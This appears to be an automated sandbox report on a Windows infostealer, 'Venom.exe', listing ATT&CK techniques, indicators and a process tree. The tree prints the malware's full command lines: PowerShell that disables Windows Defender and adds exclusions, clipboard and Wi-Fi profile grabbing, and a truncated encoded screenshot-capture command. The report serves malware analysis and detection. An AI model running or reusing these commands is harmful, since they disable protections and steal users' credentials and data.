43b40024e938294ba67eb053973f01a1e6c3b0d9365c5fa7da54e89e74824414

Analysis

max time kernel
73s
max time network
74s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2024 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Venom.exe
Size

7.5MB
MD5

5e9db4f5401cb38f434fbce2ab2f03f3
SHA1

7f55dd93461d1aa423c280a24f28b136d7b40941
SHA256

43b40024e938294ba67eb053973f01a1e6c3b0d9365c5fa7da54e89e74824414
SHA512

20420561b4789fb2fa852347cec718ebe65c8f82e0c8538e9cbc05d1d41d7d2c4ad16fa1572aa6af14d9e4c7e3146e49dc1bdfadd81be69b644233ff75b53a4f
SSDEEP

196608:vBunqZ6wfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oST:kuIH2XgHq+jq93YoS

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4656	powershell.exe
3020	powershell.exe
1348	powershell.exe
1488	powershell.exe
2768	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3464	cmd.exe
1048	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3912	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe
3180	Venom.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2808	tasklist.exe
3828	tasklist.exe
4648	tasklist.exe
2308	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023ca3-21.dat	upx
behavioral1/memory/3180-25-0x00007FF8CE2E0000-0x00007FF8CE9A2000-memory.dmp	upx
behavioral1/files/0x0007000000023ca1-31.dat	upx
behavioral1/memory/3180-32-0x00007FF8E3A60000-0x00007FF8E3A6F000-memory.dmp	upx
behavioral1/memory/3180-29-0x00007FF8E27F0000-0x00007FF8E2815000-memory.dmp	upx
behavioral1/files/0x0007000000023c96-28.dat	upx
behavioral1/files/0x0007000000023ca0-34.dat	upx
behavioral1/files/0x0007000000023c9d-48.dat	upx
behavioral1/files/0x0007000000023c9c-47.dat	upx
behavioral1/files/0x0007000000023c9b-46.dat	upx
behavioral1/files/0x0007000000023c9a-45.dat	upx
behavioral1/files/0x0007000000023c99-44.dat	upx
behavioral1/files/0x0007000000023c98-43.dat	upx
behavioral1/files/0x0007000000023c97-42.dat	upx
behavioral1/files/0x0007000000023c95-41.dat	upx
behavioral1/files/0x0007000000023ca8-40.dat	upx
behavioral1/files/0x0007000000023ca7-39.dat	upx
behavioral1/files/0x0007000000023ca6-38.dat	upx
behavioral1/files/0x0007000000023ca2-35.dat	upx
behavioral1/memory/3180-54-0x00007FF8DD2A0000-0x00007FF8DD2CC000-memory.dmp	upx
behavioral1/memory/3180-57-0x00007FF8DCFD0000-0x00007FF8DCFE9000-memory.dmp	upx
behavioral1/memory/3180-60-0x00007FF8CD9B0000-0x00007FF8CDB2F000-memory.dmp	upx
behavioral1/memory/3180-59-0x00007FF8DC940000-0x00007FF8DC964000-memory.dmp	upx
behavioral1/memory/3180-62-0x00007FF8E3690000-0x00007FF8E36A9000-memory.dmp	upx
behavioral1/memory/3180-64-0x00007FF8DDD60000-0x00007FF8DDD6D000-memory.dmp	upx
behavioral1/memory/3180-69-0x00007FF8CE2E0000-0x00007FF8CE9A2000-memory.dmp	upx
behavioral1/memory/3180-71-0x00007FF8CD470000-0x00007FF8CD9A3000-memory.dmp	upx
behavioral1/memory/3180-73-0x00007FF8DD030000-0x00007FF8DD0FE000-memory.dmp	upx
behavioral1/memory/3180-70-0x00007FF8DD100000-0x00007FF8DD133000-memory.dmp	upx
behavioral1/memory/3180-78-0x00007FF8DDC10000-0x00007FF8DDC1D000-memory.dmp	upx
behavioral1/memory/3180-77-0x00007FF8E27F0000-0x00007FF8E2815000-memory.dmp	upx
behavioral1/memory/3180-80-0x00007FF8E3A60000-0x00007FF8E3A6F000-memory.dmp	upx
behavioral1/memory/3180-81-0x00007FF8CE1C0000-0x00007FF8CE2DA000-memory.dmp	upx
behavioral1/memory/3180-75-0x00007FF8DCE80000-0x00007FF8DCE94000-memory.dmp	upx
behavioral1/memory/3180-106-0x00007FF8DD2A0000-0x00007FF8DD2CC000-memory.dmp	upx
behavioral1/memory/3180-225-0x00007FF8CD9B0000-0x00007FF8CDB2F000-memory.dmp	upx
behavioral1/memory/3180-224-0x00007FF8DC940000-0x00007FF8DC964000-memory.dmp	upx
behavioral1/memory/3180-307-0x00007FF8DD100000-0x00007FF8DD133000-memory.dmp	upx
behavioral1/memory/3180-308-0x00007FF8CD470000-0x00007FF8CD9A3000-memory.dmp	upx
behavioral1/memory/3180-320-0x00007FF8DD030000-0x00007FF8DD0FE000-memory.dmp	upx
behavioral1/memory/3180-337-0x00007FF8CD9B0000-0x00007FF8CDB2F000-memory.dmp	upx
behavioral1/memory/3180-332-0x00007FF8E27F0000-0x00007FF8E2815000-memory.dmp	upx
behavioral1/memory/3180-331-0x00007FF8CE2E0000-0x00007FF8CE9A2000-memory.dmp	upx
behavioral1/memory/3180-370-0x00007FF8DD100000-0x00007FF8DD133000-memory.dmp	upx
behavioral1/memory/3180-371-0x00007FF8CD470000-0x00007FF8CD9A3000-memory.dmp	upx
behavioral1/memory/3180-369-0x00007FF8DDD60000-0x00007FF8DDD6D000-memory.dmp	upx
behavioral1/memory/3180-368-0x00007FF8E3690000-0x00007FF8E36A9000-memory.dmp	upx
behavioral1/memory/3180-367-0x00007FF8DD030000-0x00007FF8DD0FE000-memory.dmp	upx
behavioral1/memory/3180-366-0x00007FF8CD9B0000-0x00007FF8CDB2F000-memory.dmp	upx
behavioral1/memory/3180-365-0x00007FF8DCFD0000-0x00007FF8DCFE9000-memory.dmp	upx
behavioral1/memory/3180-364-0x00007FF8DD2A0000-0x00007FF8DD2CC000-memory.dmp	upx
behavioral1/memory/3180-363-0x00007FF8E3A60000-0x00007FF8E3A6F000-memory.dmp	upx
behavioral1/memory/3180-362-0x00007FF8E27F0000-0x00007FF8E2815000-memory.dmp	upx
behavioral1/memory/3180-361-0x00007FF8DC940000-0x00007FF8DC964000-memory.dmp	upx
behavioral1/memory/3180-360-0x00007FF8CE1C0000-0x00007FF8CE2DA000-memory.dmp	upx
behavioral1/memory/3180-359-0x00007FF8DDC10000-0x00007FF8DDC1D000-memory.dmp	upx
behavioral1/memory/3180-358-0x00007FF8DCE80000-0x00007FF8DCE94000-memory.dmp	upx
behavioral1/memory/3180-346-0x00007FF8CE2E0000-0x00007FF8CE9A2000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2028	cmd.exe
3460	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2276	WMIC.exe
1608	WMIC.exe
1184	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2492	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3020	powershell.exe
1488	powershell.exe
1488	powershell.exe
3020	powershell.exe
4656	powershell.exe
4656	powershell.exe
1048	powershell.exe
1048	powershell.exe
824	powershell.exe
824	powershell.exe
1048	powershell.exe
824	powershell.exe
2768	powershell.exe
2768	powershell.exe
1508	powershell.exe
1508	powershell.exe
1348	powershell.exe
1348	powershell.exe
3164	powershell.exe
3164	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4648	tasklist.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeIncreaseQuotaPrivilege	2032	WMIC.exe
Token: SeSecurityPrivilege	2032	WMIC.exe
Token: SeTakeOwnershipPrivilege	2032	WMIC.exe
Token: SeLoadDriverPrivilege	2032	WMIC.exe
Token: SeSystemProfilePrivilege	2032	WMIC.exe
Token: SeSystemtimePrivilege	2032	WMIC.exe
Token: SeProfSingleProcessPrivilege	2032	WMIC.exe
Token: SeIncBasePriorityPrivilege	2032	WMIC.exe
Token: SeCreatePagefilePrivilege	2032	WMIC.exe
Token: SeBackupPrivilege	2032	WMIC.exe
Token: SeRestorePrivilege	2032	WMIC.exe
Token: SeShutdownPrivilege	2032	WMIC.exe
Token: SeDebugPrivilege	2032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2032	WMIC.exe
Token: SeRemoteShutdownPrivilege	2032	WMIC.exe
Token: SeUndockPrivilege	2032	WMIC.exe
Token: SeManageVolumePrivilege	2032	WMIC.exe
Token: 33	2032	WMIC.exe
Token: 34	2032	WMIC.exe
Token: 35	2032	WMIC.exe
Token: 36	2032	WMIC.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeIncreaseQuotaPrivilege	2032	WMIC.exe
Token: SeSecurityPrivilege	2032	WMIC.exe
Token: SeTakeOwnershipPrivilege	2032	WMIC.exe
Token: SeLoadDriverPrivilege	2032	WMIC.exe
Token: SeSystemProfilePrivilege	2032	WMIC.exe
Token: SeSystemtimePrivilege	2032	WMIC.exe
Token: SeProfSingleProcessPrivilege	2032	WMIC.exe
Token: SeIncBasePriorityPrivilege	2032	WMIC.exe
Token: SeCreatePagefilePrivilege	2032	WMIC.exe
Token: SeBackupPrivilege	2032	WMIC.exe
Token: SeRestorePrivilege	2032	WMIC.exe
Token: SeShutdownPrivilege	2032	WMIC.exe
Token: SeDebugPrivilege	2032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2032	WMIC.exe
Token: SeRemoteShutdownPrivilege	2032	WMIC.exe
Token: SeUndockPrivilege	2032	WMIC.exe
Token: SeManageVolumePrivilege	2032	WMIC.exe
Token: 33	2032	WMIC.exe
Token: 34	2032	WMIC.exe
Token: 35	2032	WMIC.exe
Token: 36	2032	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2276	WMIC.exe
Token: SeSecurityPrivilege	2276	WMIC.exe
Token: SeTakeOwnershipPrivilege	2276	WMIC.exe
Token: SeLoadDriverPrivilege	2276	WMIC.exe
Token: SeSystemProfilePrivilege	2276	WMIC.exe
Token: SeSystemtimePrivilege	2276	WMIC.exe
Token: SeProfSingleProcessPrivilege	2276	WMIC.exe
Token: SeIncBasePriorityPrivilege	2276	WMIC.exe
Token: SeCreatePagefilePrivilege	2276	WMIC.exe
Token: SeBackupPrivilege	2276	WMIC.exe
Token: SeRestorePrivilege	2276	WMIC.exe
Token: SeShutdownPrivilege	2276	WMIC.exe
Token: SeDebugPrivilege	2276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2276	WMIC.exe
Token: SeRemoteShutdownPrivilege	2276	WMIC.exe
Token: SeUndockPrivilege	2276	WMIC.exe
Token: SeManageVolumePrivilege	2276	WMIC.exe
Token: 33	2276	WMIC.exe
Token: 34	2276	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2740 wrote to memory of 3180	2740	Venom.exe	83
PID 2740 wrote to memory of 3180	2740	Venom.exe	83
PID 3180 wrote to memory of 324	3180	Venom.exe	87
PID 3180 wrote to memory of 324	3180	Venom.exe	87
PID 3180 wrote to memory of 4616	3180	Venom.exe	88
PID 3180 wrote to memory of 4616	3180	Venom.exe	88
PID 3180 wrote to memory of 1536	3180	Venom.exe	91
PID 3180 wrote to memory of 1536	3180	Venom.exe	91
PID 3180 wrote to memory of 4476	3180	Venom.exe	93
PID 3180 wrote to memory of 4476	3180	Venom.exe	93
PID 4616 wrote to memory of 1488	4616	cmd.exe	95
PID 4616 wrote to memory of 1488	4616	cmd.exe	95
PID 1536 wrote to memory of 4648	1536	cmd.exe	96
PID 1536 wrote to memory of 4648	1536	cmd.exe	96
PID 324 wrote to memory of 3020	324	cmd.exe	97
PID 324 wrote to memory of 3020	324	cmd.exe	97
PID 4476 wrote to memory of 2032	4476	cmd.exe	98
PID 4476 wrote to memory of 2032	4476	cmd.exe	98
PID 3180 wrote to memory of 4308	3180	Venom.exe	100
PID 3180 wrote to memory of 4308	3180	Venom.exe	100
PID 4308 wrote to memory of 1972	4308	cmd.exe	102
PID 4308 wrote to memory of 1972	4308	cmd.exe	102
PID 3180 wrote to memory of 1672	3180	Venom.exe	103
PID 3180 wrote to memory of 1672	3180	Venom.exe	103
PID 1672 wrote to memory of 2804	1672	cmd.exe	105
PID 1672 wrote to memory of 2804	1672	cmd.exe	105
PID 3180 wrote to memory of 4660	3180	Venom.exe	106
PID 3180 wrote to memory of 4660	3180	Venom.exe	106
PID 4660 wrote to memory of 2276	4660	cmd.exe	108
PID 4660 wrote to memory of 2276	4660	cmd.exe	108
PID 3180 wrote to memory of 2548	3180	Venom.exe	111
PID 3180 wrote to memory of 2548	3180	Venom.exe	111
PID 2548 wrote to memory of 1608	2548	cmd.exe	113
PID 2548 wrote to memory of 1608	2548	cmd.exe	113
PID 3180 wrote to memory of 3496	3180	Venom.exe	114
PID 3180 wrote to memory of 3496	3180	Venom.exe	114
PID 3496 wrote to memory of 4656	3496	cmd.exe	116
PID 3496 wrote to memory of 4656	3496	cmd.exe	116
PID 3180 wrote to memory of 976	3180	Venom.exe	117
PID 3180 wrote to memory of 976	3180	Venom.exe	117
PID 3180 wrote to memory of 4008	3180	Venom.exe	118
PID 3180 wrote to memory of 4008	3180	Venom.exe	118
PID 4008 wrote to memory of 2308	4008	cmd.exe	121
PID 4008 wrote to memory of 2308	4008	cmd.exe	121
PID 976 wrote to memory of 2808	976	cmd.exe	122
PID 976 wrote to memory of 2808	976	cmd.exe	122
PID 3180 wrote to memory of 1612	3180	Venom.exe	123
PID 3180 wrote to memory of 1612	3180	Venom.exe	123
PID 3180 wrote to memory of 3464	3180	Venom.exe	124
PID 3180 wrote to memory of 3464	3180	Venom.exe	124
PID 3180 wrote to memory of 1216	3180	Venom.exe	126
PID 3180 wrote to memory of 1216	3180	Venom.exe	126
PID 3180 wrote to memory of 3844	3180	Venom.exe	128
PID 3180 wrote to memory of 3844	3180	Venom.exe	128
PID 3180 wrote to memory of 2028	3180	Venom.exe	130
PID 3180 wrote to memory of 2028	3180	Venom.exe	130
PID 3180 wrote to memory of 2232	3180	Venom.exe	133
PID 3180 wrote to memory of 2232	3180	Venom.exe	133
PID 3180 wrote to memory of 1580	3180	Venom.exe	134
PID 3180 wrote to memory of 1580	3180	Venom.exe	134
PID 1612 wrote to memory of 3420	1612	cmd.exe	137
PID 1612 wrote to memory of 3420	1612	cmd.exe	137
PID 3464 wrote to memory of 1048	3464	cmd.exe	138
PID 3464 wrote to memory of 1048	3464	cmd.exe	138

C:\Users\Admin\AppData\Local\Temp\Venom.exe
"C:\Users\Admin\AppData\Local\Temp\Venom.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Users\Admin\AppData\Local\Temp\Venom.exe
  "C:\Users\Admin\AppData\Local\Temp\Venom.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venom.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venom.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1536
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1672
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1216
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3844
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2028
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2232
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEY